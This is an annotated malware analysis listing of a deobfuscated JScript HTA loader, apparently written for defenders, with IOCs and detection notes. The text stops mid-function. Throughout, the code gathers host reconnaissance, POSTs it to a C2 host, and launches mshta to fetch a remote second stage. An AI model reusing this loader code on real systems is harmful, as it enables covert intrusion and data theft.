// ---------------------------------------------------------------------------
// MALWARE SAMPLE (analysis listing) — deobfuscated JScript from an HTA/mshta
// first-stage loader. Do NOT execute. The code below is reproduced exactly as
// published; only analyst comments have been added.
//
// Behaviour visible in this listing:
//   * hides its own window and silences script errors (this block);
//   * collects host recon (domain\user, admin flag, hostname, OS name+build,
//     DC name, CPU arch, cwd, default-route IP) and POSTs it over plain HTTP
//     to http://crt.officecloud.top/st?vsxceymxlslzeqx=<token>;
//   * relaunches `mshta <C2 URL>` (via WMI Win32_Process.Create, falling back
//     to WScript.Shell.Run) and then terminates itself.
// Network IOCs: host crt.officecloud.top, path /st, query parameter name
// vsxceymxlslzeqx, recon field separator " n0body i know ", OS/build joiner
// "triplestar", request headers errno/errname/errdesc and Status: NotExist.
// Host IOCs: %TEMP%\<random-hex>.log and %TEMP%\truew.tmp scratch files,
// `cmd /c %c^oms^pec%^ /q /c chcp 1252 & ...` command lines, a
// `%comspec% /K hostname` child, `certutil -encode`, `ping 127.0.0.1 -n 2`
// used as sleep, and a write to
// HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\MaxScriptStatements.
//
// NOTE(review): the deobfuscator mapped TWO distinct objects of the original
// (JLOOXOZDZT = C2 helpers, CMXWOMTDOO = WMI process creation) to the same
// name `funcStruct6`. The second `mainFuncStruct.funcStruct6 = {}` below
// therefore discards sendDataToCNC/sendErrorDataToCNC/getCncWithJobURL/
// runMshtaFromCNC, so this listing is not runnable as-is; the original HTA
// does not have that collision.
// ---------------------------------------------------------------------------
// Move the HTA window off-screen and shrink it to 10x15 px so the user sees
// nothing; keep blurring it whenever it regains focus.
window.moveTo(-105, 300); | |
window.blur(); | |
window.resizeTo(10, 15); | |
try { | |
// Returning false from onerror suppresses the script-error dialog mshta
// would otherwise display, so any failure below stays silent.
window.onerror = function(sMsg, sUrl, sLine) { | |
return false; | |
} | |
window.onfocus = function() { | |
window.blur(); | |
} | |
} catch (e) {} | |
// Root namespace object (USZOOYWIZS in the obfuscated original). Every helper
// below hangs off it; sub-objects funcStruct1..7 group them by purpose.
var mainFuncStruct = {}; | |
// String reverser (rsS in the original). The original builds ProgIDs and
// method names from reversed fragments (e.g. "bOmetsySeliF.gnit") so that
// strings such as "Scripting.FileSystemObject" never appear literally; the
// deobfuscator inlined those, so nothing in this listing calls it.
function reverseString(s) { | |
return s.split("").reverse().join(""); | |
} | |
// COM objects used for file I/O, registry reads, environment expansion and
// process launching. ProgIDs are still split with `+` to defeat naive
// signature matching.
mainFuncStruct.fileObj = new ActiveXObject("Scrip" + "ting.FileSystemOb" + "ject"); | |
mainFuncStruct.shellObj = new ActiveXObject("WScrip" + "t.S" + "hell"); | |
// C2 configuration. Only someCNCUrl and emptyIfFirstRun are referenced by the
// rest of the listing; cncDomain and maybeToken are dead config (the token was
// redacted by the publisher — it is "REDACTED" in the obfuscated file too).
mainFuncStruct.cncDomain = "http://crt.officecloud.top/st"; | |
mainFuncStruct.maybeToken = "REDACTED"; | |
// "" here means first run: compared against "prfx" in the dispatch block at
// the bottom. Presumably the C2 serves a copy with "prfx" for the polling
// stage — not visible in this sample.
mainFuncStruct.emptyIfFirstRun = ""; | |
// Beacon URL; a job key and a trailing "&" are appended by getCncWithJobURL.
mainFuncStruct.someCNCUrl = "http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED"; | |
// Kill date in epoch milliseconds (see CanHelp). 999999999999999 ms is far
// beyond any current timestamp, so the expiry check never fires.
mainFuncStruct.highNumber = "999999999999999"; | |
// Delayed call helper (GGIAVPXSTH in the original). Under an HTA it uses
// window.setTimeout; under wscript/cscript it busy-waits `ms` milliseconds
// (100% CPU spin) and then calls `callback` synchronously.
// Nothing in this listing calls it.
mainFuncStruct.callbackAfterTimeout = function(ms, callback) { | |
if (mainFuncStruct.isRunningInMshta()) { | |
window.setTimeout(callback, ms); | |
} else { | |
var now = new Date().getTime(); | |
// Spin-wait: no sleep primitive exists in WSH JScript.
while (new Date().getTime() < now + ms); | |
callback(); | |
} | |
} | |
// Self-termination (IQSPUIAMOB in the original). Tries, in order: every
// variant of window.close() an HTA might honour, WScript.Quit, and finally a
// WMI Terminate() of what getOwnPID believes is the host process. Each step
// is wrapped in its own try/catch so the chain continues regardless of host.
// The bracket form window["close"]() is presumably chosen so that ".close("
// does not appear as a literal.
mainFuncStruct.killSelf = function() { | |
if (mainFuncStruct.isRunningInMshta()) { | |
try { | |
window["close"](); | |
} catch (e) {} | |
try { | |
window.self["close"](); | |
} catch (e) {} | |
try { | |
window.top["close"](); | |
} catch (e) {} | |
try { | |
self["close"](); | |
} catch (e) {} | |
try { | |
// Navigating the window to itself first lets a script-opened window be
// closed without the "close this window?" prompt.
window.open('', '_self', ''); | |
window["close"](); | |
} catch (e) {} | |
} | |
try { | |
// Lower-case `quit`; COM name lookup through IDispatch is presumably
// case-insensitive so this still resolves — confirm.
WScript.quit(); | |
} catch (e) {} | |
try { | |
// Last resort: find our own PID via a throw-away child and terminate it.
var pid = mainFuncStruct.funcStruct1.getOwnPID(); | |
mainFuncStruct.funcStruct1.terminateProcessByPID(pid); | |
} catch (e) {} | |
} | |
// Host detection (DYPJQVFPFC in the original). Only tests whether a global
// `window` exists, so it is true in any browser-like host (HTA/mshta or IE),
// not specifically mshta; false under wscript/cscript.
mainFuncStruct.isRunningInMshta = function() { | |
return typeof(window) !== "undefined"; | |
} | |
// True when the WScript global exists (wscript/cscript host). Defined but
// never called in this listing (XTERINGOBR in the original is unused too).
mainFuncStruct.checkIfWscriptDefined = function() { | |
return typeof(WScript) !== "undefined"; | |
} | |
// Pseudo-GUID generator (SFULCEKQPJ in the original) used only to name
// scratch files in %TEMP% (*.log). Built from Math.random, so it is neither
// a real GUID nor unpredictable; each s4() yields the hex digits of
// (1+rand)*0x1235612 with the leading digit dropped. Returns undefined if
// anything throws (the outer try swallows it).
mainFuncStruct.maybeGenGUID = function() { | |
try { | |
function s4() { | |
return Math.floor((1 + Math.random()) * 0x1235612).toString(16).substring(1); | |
} | |
return s4() + s4() + '-' + s4() + s4() + '-' + s4() + '-' + | |
s4() + '-' + s4() + s4() + s4(); | |
} catch (e) {} | |
} | |
// funcStruct4 (FSZGCSETMH in the original): host reconnaissance helpers.
mainFuncStruct.funcStruct4 = {}; | |
// Privilege check (JPWKKYVEDQ). Runs `net1 session`; that command fails with
// access denied unless the process is elevated, so the absence of the
// "ofailur" marker that the `|| echo` fallback prints means the loader is
// running as admin. net1.exe (the helper behind net.exe) is used instead of
// net.exe, presumably to avoid simple "net session" signatures. The result
// becomes the "*" suffix on the username in getComputerInfo.
mainFuncStruct.funcStruct4.getSessions = function() { | |
try { | |
var res = mainFuncStruct.funcStruct3.runCmdToFile("(net1 session || echo ofailur)", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); | |
if (res.indexOf("ofailur") == -1) { | |
return true; | |
} | |
return false; | |
} catch (e) { | |
return false; | |
} | |
} | |
// OS fingerprint (MKBDEIYCYP): ProductName and CurrentBuildNumber read from
// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion via WScript.Shell.RegRead,
// joined with the literal "triplestar" (a usable IOC in the beacon body).
// Returns "Unknown" if either read throws.
mainFuncStruct.funcStruct4.readOsVersion = function() { | |
try { | |
var osver = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName"); | |
var osbuild = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber"); | |
return osver + "triplestar" + osbuild; | |
} catch (e) {} | |
return "Unknown"; | |
} | |
// Domain-controller discovery (CSZTZBQMQU): reads the DC name cached by
// Group Policy processing under HKLM\...\Group Policy\History\DCName.
// Non-empty only on domain-joined hosts; "Unknown" otherwise or on error.
mainFuncStruct.funcStruct4.getDCName = function() { | |
try { | |
var DC = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName"); | |
if (DC.length > 0) { | |
return DC; | |
} | |
} catch (e) {} | |
return "Unknown"; | |
} | |
// CPU architecture (GTTECATTBE) from the system-wide PROCESSOR_ARCHITECTURE
// environment value in the registry (not from the process environment, which
// would report x86 inside a 32-bit mshta on a 64-bit host).
mainFuncStruct.funcStruct4.getArch = function() { | |
try { | |
var arch = mainFuncStruct.shellObj.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE"); | |
return arch; | |
} catch (e) {} | |
return "Unknown"; | |
} | |
// Current-directory probe (AYRFPFYDFU). Despite the name it does not change
// directory: it runs `cd` through runCmdToFile and returns the spawned cmd's
// working directory. Uses the FIXED scratch file %TEMP%\truew.tmp (an IOC)
// rather than a random name.
mainFuncStruct.funcStruct4.cdToTempFolder = function() { | |
try { | |
var truew = mainFuncStruct.funcStruct3.runCmdToFile("cd", "%TEMP%\\truew.tmp"); | |
return truew; | |
} catch (e) {} | |
return ""; | |
} | |
// Primary interface address (PPYJMBWCSC). Runs `route PRINT -4` and scans
// for the default-route line (two "0.0.0.0" fields: destination and mask);
// the 4th non-empty field on that line is the local interface address, which
// is returned. "" if no such line or on error.
// NOTE: line/zerocount/itemcount/correctflag are assigned without `var` and
// so leak as globals.
mainFuncStruct.funcStruct4.getRoutingInfo = function() { | |
try { | |
var routeprint4 = mainFuncStruct.funcStruct3.runCmdToFile("route PRINT -4", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); | |
var res = routeprint4.split("\r\n"); | |
for (var i = 0; i < res.length; i++) { | |
line = res[i].split(" "); | |
zerocount = 0; | |
itemcount = 0; | |
correctflag = false; | |
for (var j = 0; j < line.length; j++) { | |
// Count non-empty tokens (split(" ") yields many empties for the
// column padding route.exe prints).
if (line[j]) { | |
itemcount += 1; | |
if (itemcount == 4 && correctflag) { | |
return line[j]; | |
} | |
} | |
// destination 0.0.0.0 + netmask 0.0.0.0 identifies the default route.
if (line[j] == "0.0.0.0") { | |
zerocount += 1; | |
if (zerocount == 2) { | |
correctflag = true; | |
} | |
} | |
} | |
} | |
} catch (e) {} | |
return ""; | |
} | |
// Builds the recon string sent on first run (IAPTOFSEZA). Format:
//   DOMAIN\user[*] n0body i know HOST n0body i know OStriplestarBUILD
//   n0body i know DC n0body i know ARCH n0body i know CWD n0body i know
//   IFACE_IP n0body i know 1252 n0body i know 1252
// "*" after the username marks an elevated process (getSessions). The
// literal " n0body i know " separator is a strong body-content IOC.
mainFuncStruct.funcStruct4.getComputerInfo = function() { | |
var net = new ActiveXObject("WScript.Network"); | |
var domain = ""; | |
if (net.UserDomain.length != 0) { | |
domain = net.UserDomain; | |
} else { | |
try { | |
// Fallback: shell out to `echo %userdomain%`. The command is written
// as "echo %userdomain% 1> file", so echo emits a trailing space before
// CRLF — hence the " \r\n" split below.
domain = mainFuncStruct.funcStruct3.runCmdToFile("echo %userdomain%", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); | |
} catch (h) {} finally { | |
domain = domain.split(" \r\n")[0]; | |
} | |
} | |
// `Username` (lower-case n) relies on COM name lookup being case-insensitive
// for the UserName property — presumably fine under WSH, confirm.
var info = domain + "\\" + net.Username; | |
if (mainFuncStruct.funcStruct4.getSessions()) | |
info += "*"; | |
info += " n0body i know " + net.ComputerName; | |
info += " n0body i know " + mainFuncStruct.funcStruct4.readOsVersion(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getDCName(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getArch(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.cdToTempFolder(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getRoutingInfo(); | |
// chcp/getSomeCodePageNum are defined further down; both return "1252".
info += " n0body i know " + mainFuncStruct.funcStruct4.chcp(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getSomeCodePageNum(); | |
return info; | |
} | |
// Console code page the loader assumes (EVOWWBMQYM). Hard-coded to "1252"
// (Western); both branches return the same value, so the catch is dead. The
// `== "936"` (Simplified Chinese GBK) checks in runCmdToFile and
// readFileUntilSuccess2 can therefore never be true in this build, leaving
// the certutil-based read path reachable only via the explicit flag.
mainFuncStruct.funcStruct4.chcp = function() { | |
try { | |
return "1252" | |
} catch (e) { | |
return "1252"; | |
} | |
} | |
// Code page passed to `chcp` before every shell command (RLUXESGUDE). Always
// "1252"; the "437" fallback is unreachable because returning a literal
// cannot throw. Also appended as the last recon field.
mainFuncStruct.funcStruct4.getSomeCodePageNum = function() { | |
try { | |
return "1252" | |
} catch (e) { | |
return "437"; | |
} | |
} | |
// funcStruct6 (JLOOXOZDZT in the original): C2 messaging helpers.
// NOTE(review): the same name is re-assigned to a fresh object later in this
// listing (the block holding createProcessReturnPID, CMXWOMTDOO in the
// original), which wipes every method defined here. That collision is an
// artifact of the deobfuscation, not of the malware.
mainFuncStruct.funcStruct6 = {}; | |
// POST `data` (with optional extra headers) to the beacon URL with the
// current job key. Synchronous; returns the request object.
mainFuncStruct.funcStruct6.sendDataToCNC = function(data, headers) { | |
return mainFuncStruct.funcStruct7.sendHTTPRequest(mainFuncStruct.funcStruct6.getCncWithJobURL(), data, headers); | |
} | |
// Error telemetry to the operator (ENNXSOYMMH). JScript error number, name
// and description travel in custom request headers errno/errname/errdesc
// (detectable on the wire); the message goes in the body. Swallows its own
// failures, and the inner catch parameter shadows the `e` argument.
mainFuncStruct.funcStruct6.sendErrorDataToCNC = function(e) { | |
try { | |
var headers = {}; | |
headers["errno"] = (e.number) ? e.number : "-1"; | |
headers["errname"] = (e.name) ? e.name : "Unknown"; | |
headers["errdesc"] = (e.description) ? e.description : "Unknown"; | |
return mainFuncStruct.funcStruct6.sendDataToCNC(e.message, headers); | |
} catch (e) {} | |
} | |
// Beacon URL for a given job (KPUKINKNPO): someCNCUrl + jobkey + "&".
// With no argument the jobkey defaults to emptyIfFirstRun (""), giving
// ".../st?vsxceymxlslzeqx=<token>&". The jobkey is whatever the C2 returned
// in a response body (see CanHelp) and is appended without any encoding.
mainFuncStruct.funcStruct6.getCncWithJobURL = function(jobkey) { | |
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : mainFuncStruct.emptyIfFirstRun; | |
return mainFuncStruct.someCNCUrl + jobkey + "&"; | |
} | |
// Job poll (KEYOMPGODE on the C2 object): a body-less POST to the beacon URL
// with the default (empty) job key. Note this calls funcStruct7's
// sendHTTPRequest (POST), not funcStruct7.sendHTTPRequestEmpty (GET), despite
// the name. Used by CanHelp.
mainFuncStruct.funcStruct6.sendHTTPRequestEmpty = function() { | |
var url = mainFuncStruct.funcStruct6.getCncWithJobURL(); | |
return mainFuncStruct.funcStruct7.sendHTTPRequest(url); | |
} | |
// Stage-2 launcher (MMTQDJLVYX). Builds `mshta <beacon URL with jobkey>`
// — mshta.exe will fetch and run whatever HTA the C2 serves for that key.
// With fork32Bit the command is prefixed with the SysWOW64 (or System32)
// path so the 32-bit mshta is used on 64-bit hosts (triggered by HTTP 202
// in CanHelp). Launch goes through WMI Win32_Process.Create (hidden window;
// the resulting parent is presumably WmiPrvSE.exe rather than this host —
// confirm on a live system) with WScript.Shell.Run as fallback.
// Detection: mshta.exe with an http:// URL on its command line.
mainFuncStruct.funcStruct6.runMshtaFromCNC = function(jobkey, fork32Bit) { | |
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false; | |
// "stelsy" is just a placeholder that is replaced with the URL below.
var cmd = "mshta stelsy"; | |
if (fork32Bit) | |
cmd = mainFuncStruct.funcStruct2.getSystemFolder() + cmd; | |
cmd = cmd.replace("stelsy", mainFuncStruct.funcStruct6.getCncWithJobURL(jobkey)); | |
try { | |
mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); | |
} catch (e) { | |
// 0 = hidden window, false = do not wait.
mainFuncStruct.shellObj.Run(cmd, 0, false); | |
} | |
} | |
// funcStruct7 (KTFJHNZIRI in the original): raw HTTP transport.
mainFuncStruct.funcStruct7 = {}; | |
// HTTP client factory (PQXJNPIPNZ). Prefers Msxml2.ServerXMLHTTP.6.0 with
// all four timeouts set to 0 (~~[] evaluates to 0); falls back to
// WinHttp.WinHttpRequest.5.1 with 30 s (0x7530) resolve/connect/send
// timeouts and no receive timeout. ProgIDs are split to evade string
// matching. Both objects are out-of-browser clients, so IE zone/proxy
// settings presumably do not apply — confirm if relevant to the case.
mainFuncStruct.funcStruct7.getHttpRequestObj = function() { | |
var http = null; | |
try { | |
http = new ActiveXObject("Msxml2.ServerXMLH" + "TTP.6.0"); | |
http.setTimeouts(~~[], ~~[], ~~[], ~~[]); | |
} catch (e) { | |
http = new ActiveXObject("WinHttp.WinHttpRe" + "quest.5.1"); | |
http.setTimeouts(0x7530, 0x7530, 0x7530, ~~[]); | |
} | |
return http; | |
} | |
// Applies caller-supplied headers (PQXCRNIAHD) and forces
// "Content-Type: application/json" when the caller did not set one — even
// though the bodies sent are plain text, so that header/body mismatch is a
// usable network heuristic. Per-header failures are ignored. The method name
// is spelled via string concatenation for the same evasion reason as the
// ProgIDs.
mainFuncStruct.funcStruct7.setRequestHTTPHeaders = function(http, headers) { | |
var headers = (typeof(headers) !== "undefined") ? headers : {}; | |
var content = false; | |
for (var key in headers) { | |
try { | |
var value = headers[key]; | |
http.setRequestHeader(key, value); | |
} catch (h) {} finally { | |
if (key.toUpperCase() == "CONTENT-TYPE") | |
content = true; | |
} | |
} | |
if (!content) | |
http["setR" + "eque" + "stH" + "eader"]("Content-Type", "application/json"); | |
} | |
// Synchronous POST (JHFPHAPALS). `data` defaults to ""; `headers` is
// optional. open(..., false) blocks until the response arrives, so a slow
// C2 stalls the whole script. Returns the request object (status and
// responseText are read by callers).
mainFuncStruct.funcStruct7.sendHTTPRequest = function(url, data, headers) { | |
var data = (typeof(data) !== "undefined") ? data : ""; | |
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); | |
http.open("POST", url, false); | |
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); | |
http.send(data); | |
return http; | |
} | |
// Synchronous GET (the transport-level KEYOMPGODE). Same default
// Content-Type injection as POST. Not called anywhere in this listing — the
// C2-level sendHTTPRequestEmpty uses the POST path instead. "open"/"send"
// are split into fragments for evasion.
mainFuncStruct.funcStruct7.sendHTTPRequestEmpty = function(url, headers) { | |
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); | |
http["op" + "en"]("GET", url, false); | |
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); | |
http["se" + "nd"](); | |
return http; | |
} | |
// funcStruct1 (ERDXQCZMRN in the original): process enumeration/termination.
mainFuncStruct.funcStruct1 = {}; | |
// Self-PID discovery trick (LLXQUFFVDG): spawn `%comspec% /K hostname`
// (/K keeps the cmd alive so it can be found), look it up in Win32_Process,
// read its ParentProcessId, then terminate the child. The child is created
// via createProcessReturnPID, i.e. through WMI Win32_Process.Create.
// NOTE(review): a process created through WMI presumably has the WMI
// provider host as its parent, not this script host — so the PID this
// returns may not be "own" at all; confirm on a live system. If the child is
// not found, latestProc stays null and the ParentProcessId read throws
// (callers wrap this in try/catch). `latestTime` is unused.
// Detection: a short-lived `cmd.exe /K hostname` with a hidden window.
mainFuncStruct.funcStruct1.getOwnPID = function() { | |
var cmd = mainFuncStruct.funcStruct2.expandEnvStrings("%comspec% /K hostname"); | |
var childPid = mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); | |
var pid = -1; | |
var latestTime = 0; | |
var latestProc = null; | |
var processes = mainFuncStruct.funcStruct1.getProcessList(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) { | |
var proc = items.item(); | |
try { | |
if (proc.ProcessId == childPid) { | |
latestProc = proc; | |
break; | |
} | |
} catch (e) {} | |
items.moveNext(); | |
} | |
pid = latestProc.ParentProcessId; | |
latestProc.Terminate(); | |
return pid; | |
} | |
// Kill by PID (IVRPZFVXMC) via Win32_Process.Terminate. Returns true when a
// matching process was found and Terminate() was invoked (its return code is
// not checked), false when no process with that PID exists. Errors on
// individual entries are skipped.
mainFuncStruct.funcStruct1.terminateProcessByPID = function(pid) { | |
var processes = mainFuncStruct.funcStruct1.getProcessList(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) { | |
var proc = items.item(); | |
try { | |
if (proc.ProcessId == pid) { | |
proc.Terminate(); | |
return true; | |
} | |
} catch (e) {} | |
items.moveNext(); | |
} | |
return false; | |
} | |
// Full process list (ZYGNWLRIBN): `Select * From Win32_Process` on the local
// root\cimv2 namespace with impersonation. Detection: WMI query activity
// from an mshta.exe/wscript.exe client.
mainFuncStruct.funcStruct1.getProcessList = function() { | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); | |
var query = "Select * From Win32_Process"; | |
return wmi.ExecQuery(query); | |
} | |
// funcStruct5 (XDGAVBPIRF in the original): registry writes through the WMI
// StdRegProv provider (RegRead via WScript.Shell is used for reads).
mainFuncStruct.funcStruct5 = {}; | |
// Hive handles as StdRegProv expects them.
mainFuncStruct.funcStruct5.HKEY_CLASSES_ROOT = 0x80000000; | |
mainFuncStruct.funcStruct5.HKCU = 0x80000001; | |
mainFuncStruct.funcStruct5.HKLM = 0x80000002; | |
// Internal type selectors for setRegistryValue — NOT the Windows REG_*
// constants (REG_DWORD is 4 in the Win32 API, 2 here).
mainFuncStruct.funcStruct5.REG_STRING = 0; | |
mainFuncStruct.funcStruct5.REG_BINARY = 1; | |
mainFuncStruct.funcStruct5.REG_DWORD = 2; | |
mainFuncStruct.funcStruct5.REG_QWORD = 3; | |
// StdRegProv on `computer` (default "." = local). The remote capability is
// present but every call in this listing leaves `computer` undefined.
mainFuncStruct.funcStruct5.getWmiRegistryObject = function(computer) { | |
var computer = (typeof(computer) !== "undefined") ? computer : "."; | |
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv"); | |
return reg; | |
} | |
// Create-or-update a registry value (VIUNPHBKRR): CreateKey (idempotent for
// existing keys) followed by the Set*Value matching `valType`. WMI return
// codes are ignored, so failures (e.g. access denied) are silent. The only
// call site writes HKCU\SOFTWARE\Microsoft\Internet Explorer\Styles\
// MaxScriptStatements = 0xFFFFFFFF — a registry artifact worth alerting on.
mainFuncStruct.funcStruct5.setRegistryValue = function(hKey, path, key, value, valType, computer) { | |
var reg = mainFuncStruct.funcStruct5.getWmiRegistryObject(computer); | |
reg.CreateKey(hKey, path); | |
if (valType == mainFuncStruct.funcStruct5.REG_STRING) | |
reg.SetStringValue(hKey, path, key, value); | |
else if (valType == mainFuncStruct.funcStruct5.REG_DWORD) | |
reg.SetDWORDValue(hKey, path, key, value); | |
else if (valType == mainFuncStruct.funcStruct5.REG_QWORD) | |
reg.SetQWORDValue(hKey, path, key, value); | |
else if (valType == mainFuncStruct.funcStruct5.REG_BINARY) | |
reg.SetBinaryValue(hKey, path, key, value); | |
} | |
// WMI process creation (CMXWOMTDOO in the original — a DIFFERENT object from
// the C2 helpers that the deobfuscator also named funcStruct6).
// NOTE(review): this `= {}` replaces the earlier funcStruct6 object and
// drops sendDataToCNC/sendErrorDataToCNC/getCncWithJobURL/runMshtaFromCNC;
// in the original the two live side by side. Treat the name clash as a
// listing error when reading call sites.
mainFuncStruct.funcStruct6 = {}; | |
// Launch `cmd` through Win32_Process.Create with a hidden, 1x1 px window at
// (1,1) and CreateFlags 16777216 = 0x01000000 (CREATE_BREAKAWAY_FROM_JOB, so
// the child escapes any job object the host runs in). Returns the new PID;
// the method's ReturnValue is not checked. Processes created this way are
// presumably parented by the WMI provider host, which breaks the usual
// mshta -> child process-tree view — confirm when building detections.
mainFuncStruct.funcStruct6.createProcessReturnPID = function(cmd) { | |
var SW_HIDE = 0; | |
var pid = 0; | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); | |
si.ShowWindow = SW_HIDE; | |
si.CreateFlags = 16777216; | |
// `ySize` (lower-case y) relies on case-insensitive COM property lookup
// for YSize — presumably works, confirm.
si.X = si.Y = si.XSize = si.ySize = 1; | |
var w32proc = wmi.Get("Win32_Process"); | |
var method = w32proc.Methods_.Item("Create"); | |
var inParams = method.InParameters.SpawnInstance_(); | |
inParams.CommandLine = cmd; | |
inParams.CurrentDirectory = null; | |
inParams.ProcessStartupInformation = si; | |
var outParams = w32proc.ExecMethod_("Create", inParams); | |
return outParams.ProcessId; | |
} | |
// funcStruct3 (PUZLNFITWY in the original): shell command execution.
mainFuncStruct.funcStruct3 = {}; | |
// Run a command and capture its output via a scratch file (GXJDCREARQ).
// Resulting command line (an IOC):
//   cmd /c %c^oms^pec%^ /q /c chcp 1252 & <cmd> 1> <stdOutPath> 2>&1
// The carets inside "comspec" are presumably stripped by cmd's parser and
// exist only to break literal matching on "%comspec%" — confirm the exact
// expansion on a test box. The outer cmd runs hidden (0) and waits (true);
// the output file is then read (readFileUntilSuccess only when chcp() is
// "936", which this build never returns; otherwise readFileUntilSuccess2)
// and deleted. Returns the captured text, or "" if the file never appeared.
mainFuncStruct.funcStruct3.runCmdToFile = function(cmd, stdOutPath) { | |
cmd = "chcp " + mainFuncStruct.funcStruct4.getSomeCodePageNum() + " & " + cmd; | |
var c = "cmd /c %c^oms^pec%^ /q /c " + cmd + " 1> " + mainFuncStruct.funcStruct2.expandEnvStrings(stdOutPath); | |
c += " 2>&1"; | |
mainFuncStruct.shellObj.Run(c, 0, true); | |
if (mainFuncStruct.funcStruct4.chcp() == "936") { | |
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(stdOutPath); | |
} else { | |
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess2(stdOutPath); | |
} | |
mainFuncStruct.funcStruct2.shellDeleteFile(stdOutPath); | |
return data; | |
} | |
// Fire-and-forget (or wait) command runner (DLWSGBGTRP). Builds the same
// caret-obfuscated `cmd /c %c^oms^pe^c% /q /c ...` wrapper into `c` but then
// passes the RAW `cmd` to Run — `c` is dead, so callers' commands
// ("ping 127.0.0.1 -n 2", "certutil -encode ...") run directly. Window
// style is 0 (hidden; written as 5 - 5). fork=true (default) returns
// immediately; fork=false waits — used with ping as a ~1 s sleep.
mainFuncStruct.funcStruct3.shellRunCommand = function(cmd, fork) { | |
var fork = (typeof(fork) !== "undefined") ? fork : true; | |
var c = "cmd /c %c^oms^pe^c% /q /c " + cmd; | |
mainFuncStruct.shellObj.Run(cmd, 5 - 5, !fork); | |
} | |
// funcStruct2 (WXUXMBSDFO in the original): filesystem helpers.
mainFuncStruct.funcStruct2 = {}; | |
// Expand %VAR% references (QUMMKJWDNW) via WScript.Shell; used for every
// %TEMP%/%WINDIR%/%comspec% path in the loader.
mainFuncStruct.funcStruct2.expandEnvStrings = function(path) { | |
return mainFuncStruct.shellObj.ExpandEnvironmentStrings(path); | |
} | |
// Path used to pick a 32-bit mshta (KKJQGQQLNJ): %WINDIR%\SysWOW64\ when
// that folder exists (64-bit Windows), else %WINDIR%\System32\. Only used
// by runMshtaFromCNC when the C2 answers 202.
mainFuncStruct.funcStruct2.getSystemFolder = function() { | |
var base = mainFuncStruct.funcStruct2.expandEnvStrings("%WINDIR%"); | |
var syswow64 = base + "\\SysWOW64\\"; | |
if (mainFuncStruct.fileObj.FolderExists(syswow64)) | |
return syswow64; | |
return base + "\\System32\\"; | |
} | |
// Poll-until-readable file read (JOUFZBIORZ). Waits for `path` to exist and
// be non-empty, then ReadAll() via OpenTextFile(path, 1=ForReading,
// create=false, 0=ASCII). Each wait is a hidden `ping 127.0.0.1 -n 2`
// (≈1 s). Gives up with "" after 180 missing-file polls (≈3 min), but a
// read that throws (file still locked by the writer) retries FOREVER since
// loopcount is not incremented on that branch.
mainFuncStruct.funcStruct2.readFileUntilSuccess = function(path) { | |
var loopcount = 0; | |
while (true) { | |
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { | |
try { | |
var fd = mainFuncStruct.fileObj.OpenTextFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), 1, false, 0); | |
var data = fd.ReadAll(); | |
fd.Close(); | |
return data; | |
} catch (e) { | |
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); | |
continue; | |
} | |
} else { | |
loopcount += 1; | |
if (loopcount > 180) { | |
return ""; | |
} | |
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); | |
} | |
} | |
} | |
// Variant file reader (KPPKUQVGHI) with two optional flags:
//  * exists=true: if the file is absent, POST an empty body with the header
//    "Status: NotExist" to the C2 and return "" instead of polling.
//  * certutil=true (or chcp()=="936", never true in this build): base64-encode
//    the file with `certutil -encode <path> %TEMP%\<random>.log` (LOLBin;
//    output is PEM-wrapped base64) and return THAT text, presumably so
//    non-ASCII console output survives the transport. certutil is launched
//    without waiting, so the encoded file is itself polled for.
// Otherwise reads the raw file via OpenAsTextStream().read(Size). Same
// ≈3 min polling limit as readFileUntilSuccess. No caller in this listing
// passes either flag.
mainFuncStruct.funcStruct2.readFileUntilSuccess2 = function(path, exists, certutil) { | |
var exists = (typeof(exists) !== "undefined") ? exists : false; | |
var certutil = (typeof(certutil) !== "undefined") ? certutil : false; | |
if (!mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && exists) { | |
var headers = {}; | |
headers["Sta" + "tus"] = "Not" + "Exist"; | |
mainFuncStruct.funcStruct6.sendDataToCNC("", headers); | |
return ""; | |
} | |
var loopcount = 0; | |
